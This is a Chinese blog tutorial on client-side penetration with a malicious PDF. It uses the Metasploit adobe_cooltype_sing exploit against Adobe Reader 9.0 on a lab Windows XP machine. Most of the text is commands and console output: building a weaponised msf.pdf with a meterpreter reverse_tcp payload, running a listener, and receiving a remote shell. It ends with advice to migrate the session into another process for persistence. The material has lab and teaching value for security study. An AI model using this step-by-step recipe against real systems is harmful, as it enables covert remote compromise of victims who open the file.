客户端渗透之——基于PDF文件格式的渗透攻击

版权声明：本文为博主原创文章，未经博主允许不得转载。 https://blog.csdn.net/l1028386804/article/details/86633022

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/86633022

攻击机 Kali 192.168.175.128

靶机 WinXP 192.168.175.130

漏洞程序： Adobe Reader 9.0

1.生成PDF文件

msfconsole
use exploit/windows/fileformat/adobe_cooltype_sing 
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.175.128
show options
exploit

具体如下所示：

msf5 > use exploit/windows/fileformat/adobe_cooltype_sing 
msf5 exploit(windows/fileformat/adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/fileformat/adobe_cooltype_sing) > set LHOST 192.168.175.128
LHOST => 192.168.175.128
msf5 exploit(windows/fileformat/adobe_cooltype_sing) > show options

Module options (exploit/windows/fileformat/adobe_cooltype_sing):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.pdf          yes       The file name.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.175.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

   **DisablePayloadHandler: True   (RHOST and RPORT settings will be ignored!)**


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/fileformat/adobe_cooltype_sing) > exploit

[*] Creating 'msf.pdf' file...
[+] msf.pdf stored at /root/.msf4/local/msf.pdf
msf5 exploit(windows/fileformat/adobe_cooltype_sing) > 

可以看到在/root/.msf4/local/目录下生成了msf.pdf。

实际中，我们需要想办法将这个文件传到靶机上。这里为了简单，我直接将文件拷贝到靶机上。

2.上传PDF到靶机

将生成的msf.pdf上传到靶机

3.实施攻击

msfconsole
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.175.128
exploit

具体如下：

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set LHOST 192.168.175.128
LHOST => 192.168.175.128
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.175.128:4444 

4.打开PDF文件

在靶机上利用Adobe Reader 9.0打开PDF文件

5.查看获得的Meterpreter

在攻击机Kali上，我们看到MSF控制台中获得了Meterpreter权限。

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.175.128:4444 
[*] Sending stage (179779 bytes) to 192.168.175.130
[*] Meterpreter session 1 opened (192.168.175.128:4444 -> 192.168.175.130:1431) at 2019-01-24 16:05:52 +0800

meterpreter > 

最后，最好用migrate命令将当前会话进程绑定到系统的其他进程中。